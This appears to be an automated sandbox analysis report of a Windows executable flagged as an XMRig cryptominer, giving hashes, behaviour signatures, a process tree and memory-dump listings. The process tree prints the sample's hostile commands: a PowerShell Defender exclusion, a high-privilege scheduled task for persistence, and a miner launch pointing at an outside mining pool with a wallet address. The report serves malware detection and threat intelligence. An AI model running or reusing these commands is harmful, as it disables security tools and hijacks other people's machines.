Analysis

  • max time kernel
    80s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2023, 02:55

General

  • Target

    1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe

  • Size

    1.7MB

  • MD5

    d85f82eb236129cf1628f10f89f8e6b4

  • SHA1

    6325eba8d30318c110cb48c5a1492701b8368821

  • SHA256

    1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8

  • SHA512

    6864b16893f32b8655a8d67f8a35b9b351a9d7ec39f82b5ed4bf85881d45b7f240aedfe8b9ab8e78aae3854fafc9a0db589168373b913d1cf267872818a1aa91

  • SSDEEP

    24576:nrxLARAVB54buvVCT1J0URZsAchJ2/o+td+Gus4eIKuvgLZombBafpwaD+y:nRRB5GSoT020O/oU+GuCr3Lmmbeay

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe
    "C:\Users\Admin\AppData\Local\Temp\1323240de51c0a640974b4f2e6e05fe40045aa50188f22dc2614893bff368ad8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MGPDL" /tr "C:\ProgramData\SonyProduction\MGPDL.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MGPDL" /tr "C:\ProgramData\SonyProduction\MGPDL.exe"
        3⤵
        • Creates scheduled task(s)
        PID:1992
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:5555 -u 463n1rdmaG45nXxKYLgq6dJdfpNpjNyFTNWnErGi6VYbdUqRqLXkG3h8R1oDYAorTkf8xo6J6r2r24x8mrq1yEwFHfyM9LR -R --variant=-1 --max-cpu-usage=50 --donate-level=1 -opencl
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:364

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/364-358-0x0000000002110000-0x0000000002130000-memory.dmp

          Filesize

          128KB

        • memory/364-357-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/364-356-0x0000000002110000-0x0000000002130000-memory.dmp

          Filesize

          128KB

        • memory/364-257-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1700-86-0x000000001B0C0000-0x000000001B3A2000-memory.dmp

          Filesize

          2.9MB

        • memory/1700-91-0x000000000264B000-0x0000000002682000-memory.dmp

          Filesize

          220KB

        • memory/1700-90-0x0000000002640000-0x00000000026C0000-memory.dmp

          Filesize

          512KB

        • memory/1700-89-0x0000000002640000-0x00000000026C0000-memory.dmp

          Filesize

          512KB

        • memory/1700-87-0x0000000002590000-0x0000000002598000-memory.dmp

          Filesize

          32KB

        • memory/2024-71-0x000007FEFF950000-0x000007FEFFA7D000-memory.dmp

          Filesize

          1.2MB

        • memory/2024-96-0x000007FEFF330000-0x000007FEFF3CF000-memory.dmp

          Filesize

          636KB

        • memory/2024-70-0x000007FEF62C0000-0x000007FEF6CAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2024-72-0x00000000003D0000-0x0000000000574000-memory.dmp

          Filesize

          1.6MB

        • memory/2024-56-0x0000000000310000-0x0000000000352000-memory.dmp

          Filesize

          264KB

        • memory/2024-73-0x0000000000310000-0x0000000000352000-memory.dmp

          Filesize

          264KB

        • memory/2024-74-0x000007FEFDED0000-0x000007FEFE0D3000-memory.dmp

          Filesize

          2.0MB

        • memory/2024-75-0x00000000003D0000-0x0000000000574000-memory.dmp

          Filesize

          1.6MB

        • memory/2024-76-0x000007FEF7230000-0x000007FEF735C000-memory.dmp

          Filesize

          1.2MB

        • memory/2024-77-0x000007FEFD230000-0x000007FEFD252000-memory.dmp

          Filesize

          136KB

        • memory/2024-78-0x000007FEFD0E0000-0x000007FEFD0F7000-memory.dmp

          Filesize

          92KB

        • memory/2024-81-0x000007FEFF150000-0x000007FEFF227000-memory.dmp

          Filesize

          860KB

        • memory/2024-68-0x000007FEFB6D0000-0x000007FEFB7C7000-memory.dmp

          Filesize

          988KB

        • memory/2024-67-0x000007FEFF2B0000-0x000007FEFF321000-memory.dmp

          Filesize

          452KB

        • memory/2024-88-0x000000001BF40000-0x000000001BFC0000-memory.dmp

          Filesize

          512KB

        • memory/2024-66-0x000007FEFDA30000-0x000007FEFDA9C000-memory.dmp

          Filesize

          432KB

        • memory/2024-65-0x0000000077880000-0x000000007799F000-memory.dmp

          Filesize

          1.1MB

        • memory/2024-64-0x000007FEFF330000-0x000007FEFF3CF000-memory.dmp

          Filesize

          636KB

        • memory/2024-93-0x0000000077AA0000-0x0000000077C49000-memory.dmp

          Filesize

          1.7MB

        • memory/2024-94-0x0000000077880000-0x000000007799F000-memory.dmp

          Filesize

          1.1MB

        • memory/2024-95-0x000007FEFDA30000-0x000007FEFDA9C000-memory.dmp

          Filesize

          432KB

        • memory/2024-69-0x000007FEFEFD0000-0x000007FEFF0AB000-memory.dmp

          Filesize

          876KB

        • memory/2024-97-0x000007FEFF2B0000-0x000007FEFF321000-memory.dmp

          Filesize

          452KB

        • memory/2024-100-0x000007FEFB920000-0x000007FEFB98F000-memory.dmp

          Filesize

          444KB

        • memory/2024-101-0x000007FEFEFD0000-0x000007FEFF0AB000-memory.dmp

          Filesize

          876KB

        • memory/2024-102-0x000007FEFF950000-0x000007FEFFA7D000-memory.dmp

          Filesize

          1.2MB

        • memory/2024-103-0x000007FEFB7D0000-0x000007FEFB86C000-memory.dmp

          Filesize

          624KB

        • memory/2024-104-0x000007FEFC9B0000-0x000007FEFC9BC000-memory.dmp

          Filesize

          48KB

        • memory/2024-105-0x000007FEF62C0000-0x000007FEF6CAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2024-106-0x000007FEFB6D0000-0x000007FEFB7C7000-memory.dmp

          Filesize

          988KB

        • memory/2024-107-0x000007FEFDED0000-0x000007FEFE0D3000-memory.dmp

          Filesize

          2.0MB

        • memory/2024-108-0x000007FEFC160000-0x000007FEFC163000-memory.dmp

          Filesize

          12KB

        • memory/2024-109-0x000007FEF7230000-0x000007FEF735C000-memory.dmp

          Filesize

          1.2MB

        • memory/2024-110-0x000007FEFB9F0000-0x000007FEFBA06000-memory.dmp

          Filesize

          88KB

        • memory/2024-112-0x000007FEFD0E0000-0x000007FEFD0F7000-memory.dmp

          Filesize

          92KB

        • memory/2024-114-0x00000000003D0000-0x0000000000574000-memory.dmp

          Filesize

          1.6MB

        • memory/2024-115-0x0000000000310000-0x0000000000352000-memory.dmp

          Filesize

          264KB

        • memory/2024-138-0x000000001BF40000-0x000000001BFC0000-memory.dmp

          Filesize

          512KB

        • memory/2024-63-0x00000000779A0000-0x0000000077A9A000-memory.dmp

          Filesize

          1000KB

        • memory/2024-324-0x00000000003D0000-0x0000000000574000-memory.dmp

          Filesize

          1.6MB

        • memory/2024-62-0x000007FEFF240000-0x000007FEFF2A7000-memory.dmp

          Filesize

          412KB

        • memory/2024-61-0x000007FEFB7D0000-0x000007FEFB86C000-memory.dmp

          Filesize

          624KB

        • memory/2024-60-0x000007FEFB920000-0x000007FEFB98F000-memory.dmp

          Filesize

          444KB